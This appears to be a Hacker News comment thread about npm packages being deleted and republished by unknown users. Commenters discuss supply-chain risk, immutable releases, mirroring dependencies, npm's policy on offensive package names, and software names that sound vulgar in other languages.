Well, we don't know what caused the issue yet, so we can't say for sure. But I suspect that whatever family of problem deleted the packages causing this trouble could just as easily apply to the deletion (and illegitimate reclamation) of usernames.
I don't get why not just use git repo registry (e.g. github) for package management. If you work in a "strict" environment you can basically fork all your dependencies and use your own git repo registry.
NPM already allows using git repos, but needs some tweaks to allow better support:
For the purpose of reproducible `node_modules` tree.
Ideally if all packages would use commits, and the installation algorithm will never change, then there will be no need for lock files.
In reality some packages will use NPM existing mechanism, so "git-based algorithm" will need to accommodate for that by reading git repo of the NPM package and referring to a specific commit, which should be store in `package-lock.json`.
Could someone explain why dependency-management-systems don't enforce immutable releases? Ie, package owners can publish all the new versions they want, but they are never able to edit/remove/liberate an already-released version. It seems like that would solve so many problems, such as the left-pad fiasco.
As someone unfamiliar with NPM, why does it not lock package names for a certain period of time? Rubygems has a 90 day period, so if a package is completely removed, the name can't be used for that long. That seems like it would help with the security side of these problems.
> As someone unfamiliar with NPM, why does it not lock package names for a certain period of time?
From [1]:
> With the default registry (registry.npmjs.org), unpublish is only allowed with versions published in the last 24 hours. If you are trying to unpublish a version published longer ago than that, contact support@npmjs.com.
I am kinda assuming that if npm support were to help you unpublish a package that is depended upon (they might refuse), they would prevent someone else from re-publishing to that name (they might put up their own placeholder package, like they did during the left-pad incident), but granted I can't find this stated anywhere.
I think the reason re-publishing seemed to happen in this case was they weren't prepared for whatever vector allowed for the deletion of these packages.
I made a half-joking comment on that thread that "'Bout time NPM goes blockchain." Either someone deleted it, or GitHub lost it among all the traffic to that issue.
Wonder if npm, Inc. would view a decentralized registry as a threat to their business model?
Is there a possibility that npm turn package names into "author/package" style, so there would be less confusion on what the users are installing and less chance of name squatting?
Remember to freeze your packages after installing them as a project dependency. You should have the packages in your source tree or your own internal package manager (local nuget, for example).
Is there any chance of something similar happening for Nuget? I rely on it heavily for project dependencies, and I'd like to know if there's a ticking timebomb there too.
So, funny story: I registered the "nazi" npm package. When you require it, it says "I did nazi that coming." That's it. (Though it would've been a funny name for a linter.)
... Or it did. I received a harshly worded letter from npm saying they axed it. It hit all the talking points about inclusiveness and making sure no one feels even slightly annoyed.
Meh. No point to this story. Just an interesting situation with an inconsistently curated package manager. I was surprised there was an unofficial undocumented banlist.
I guess lots of people will think that a policy like Avoid using offensive or harassing package names, nicknames, or other identifiers that might detract from a friendly, safe, and welcoming environment for all. stifles their inner something or other though.
seems like a good reflection of the current social climate: they have a policy to prevent mildly offensive package names, and they enforce it, but they don't have a solution to packages randomly disappearing and being replaced with malicious versions.
Or it could be that it's easy to do simple low-hanging-fruit things and harder to do more complicated things. The whole JS ecosystem has come together in a rather ad-hoc way, it's plain stupidity or moronic political gamesmanship to assume more motivation than "nobody thought it worth blocking the entire platform to build a fully-trusted base infrastructure so far."
It's funny how many people get easily pissed off about other people allegedly being oversensitive. And it's sad how many of them are part of my same bullied-as-young-nerds cohort, considering that it appears their reaction to getting some power for the first time in their lives was to jump into the bully camp themselves.
That seems like an implausible explanation for a comment trying to make a political issue out of two disjoint things: a package manager design flaw and an editorial control policy for package names. "Publishers" having a level of interest in what goes out on there platform is as old as anything, and so is flawed software design.
So I stick by my stance that it seems like tying to try those things together ("you screwed this up because you're morally in the wrong as shown by your focusing on the wrong things") to advance a personal political agenda is the more bullying behavior, here.
> using political correctness to bully people around them.
"Please don't use unnecessarily harmful/crude/we-don't-like-it language when giving names to pieces of computer software that we host, manage, and coordinate for you" counts as bullying now? I think not. As they say, if you don't like it, don't play.
And besides, NPM seems pretty focused on package names alone (as they should be). If you absolutely must live out your libertarian fantasy by being insulting, nobody's stopping you from making the API to your package something like:
But people do have knee-jerk reactions, and people do overreact for fear of it being bullying next time. None of those are likely to be necessary on this case, but people's feeling aren't very contextual. Many people will react to overreaching political correctness for fear alone, and it isn't nice for the GP to accuse them of bullying.
Yes, it's sad what people do out of fear. But excusing and ignoring unpleasant behavior as a "knee-jerk reaction" or "overreaction," and complaining about someone criticizing it, has many, many dangers of its own.
I miss the days when everyone predicted and solved technical bugs with ease and didn’t have time to do eye—rollingly simple things like say “don’t be an idiot”. Remind me when that social climate was in place, again?
Try a package named Nazí, which provides a collection of the chess games of 2016 US Women's Chess Champion Nazí Paikidze [1]. At the same time also do one named Fabiano, which provides a collection of the games of Fabiano Caruana [2], the 2016 US Chess Champion.
If they take that down the Nazí one but not the Fabiano one, you can then take your mischief making to the next level by accusing them of being misogynists for banning a package promoting a woman chess champion but leaving up the one for the man.
> But HN user "baby" recently made a blockchain based image board that was theoretically impossible to control. How would people behave in such a situation? Who would you even punsh?
Probably will get scooped up by pedophiles sooner or later, followed by a couple high profile arrests and everyone will be scared shitless to run a node for that blockchain. CP has always been a good source of scare for Tor exit node operators, thankfully enough Tor nodes don't store the stuff in contrast to a blockchain - so at least the operators didn't have to serve jail time but a couple have had their houses raided by the cops and all IT equipment confiscated for months.
Actually, from a libertarian POV I really like the idea, both behind an uncensorable imageboard and Tor, but the simple fact that pedophiles and Nazis can and will abuse the openness for their vile gains makes me believe that the world will probably never be ready for such a thing as widespread service. For now we as society have to be lucky that many pedophiles, drug dealers and Nazis don't really care about good opsec... but that one is bound to change.
> Actually, from a libertarian POV I really like the idea, both behind an uncensorable imageboard and Tor, but the simple fact that pedophiles and Nazis can and will abuse the openness for their vile gains makes me believe that the world will probably never be ready for such a thing as widespread service.
Similar considerations are why I never ran a Tor exit node, despite my inner geek wanting to as soon as I heard about it because the technology is cool.
The deciding factor was that almost every good thing that I could think of or that people suggested that a truly anonymous, untraceable, non-moderated, anybody to anybody communication system could be used for were things that could be reasonably accomplished by other means that are not as open to abuse.
For example, a common scenario offered is someone inside an oppressive regime working to document the regime's abuses and bring it down. They would be tortured and killed (and possibly so would their family) if their identity became known.
But they just need a need a secure channel to a trusted contact outside the reach of the regime who can relay messages for them. It does not have to be an anybody to anybody channel or a non-moderated channel.
The only things I could think of that really need something like Tor are things where what you are doing is so near universally frowned upon that there is almost nobody willing to be publicly associated with facilitating it.
> What if "emacs" was a smear in Portuguese, or "vim" was an unspeakable slur in India?
You can even get this kind of problem without involving a different language, because words can have different meaning in different fields.
There is a (probably) urban legend about a mathematics grad student working in algebraic geometry returning from a conference, who finds he is sharing the security line at the airport with another conference attendee and they start chatting about algebraic geometry, talking about "blowing up points on a plane". It does not go over well with the non-mathematicians in line or with the TSA agents.
Efim Zelmanov, a noted algebraist, tells of being stopped by the KGB on the way to a conference and being questioned at length because he had books with him about "free groups" and "radicals".
> I've often wondered whether foreign users ever get annoyed with some of our names that happen to acronym to something unfortunate in their native language. Do they just have to live with it, or does it never happen?
All the time, and the response from devs ... depends. Remember the recent Pik image format? Or Pidora linux, which to a russian ear sound akin to "FedoPiLix"? Or Vista, which is exactly "chicken" in latvian?
Mostly you kind of keep laughing and wincing for a few years, then you sorta get used to it.
> Yet this is all very English-centric. I've often wondered whether foreign users ever get annoyed with some of our names that happen to acronym to something unfortunate in their native language. Do they just have to live with it, or does it never happen?
Well we have to live with it, and funny things happen. In Turkish, which is my mother tongue, the English word Scheme sounds very similar to "sikim", which is a very vulgar way to say "my dick". About five years ago having lunch with colleagues (programmers), chattering about programming languages, when I said I liked Scheme, I had some weird looks :) Some more on this: https://news.ycombinator.com/item?id=7421315
> New Geometry Representation might be a fine name for a new format, but you're not going to use its acronym.
I might... the acronym doesn't ring any bells and a Google search doesn't show anything special (if anything, it already shows a bunch of other things - including companies and organizations - using the same letters). What is the issue?
I think they are imagining people trying to pronounce the acronyms ngr and fgt and getting offensive words out of them. I don’t think that would have occurred to me.
Seriously, you shouldn't depend on third party things existing happily to cut releases of your software. Mirror, vendor, proxy, whatever -- but absolutely you should strive to yourself be the biggest weakness in your dependency chain.
That’s probably fine from the security perspective, but the hash won’t make the package re-appear if it disappears out of nowhere. That’s the other benefit of a private/on-premesis mirror.
True. I work with PyPI and it's been extremely solid for years, so we tend to just not consider this a problem at all. Pipenv stores hashes for each package version as well, so you get the security aspect built in.
Pipenv has pretty much fixed Python packaging/dependencies, in my opinion. It's the all-in-one tool I've always wanted. If you do any Python work, try it, it's great.
Example: https://www.npmjs.com/package/duplexer3 which has 4M monthly downloads just reappeared, published by a fresh npm user. They published another two versions since then, so it's possible they've initially republished unchanged package, but now are messing with the code.
Previously the package belonged to someone else: https://webcache.googleusercontent.com/search?q=cache:oDbrgP...
I'm not saying it's a malicious attempt, but it might be and it very much looks like. Be cautious as you might don't notice if some packages your code is dependent on were republished with a malicious code. It might take some time for NPM to sort this out and restore original packages.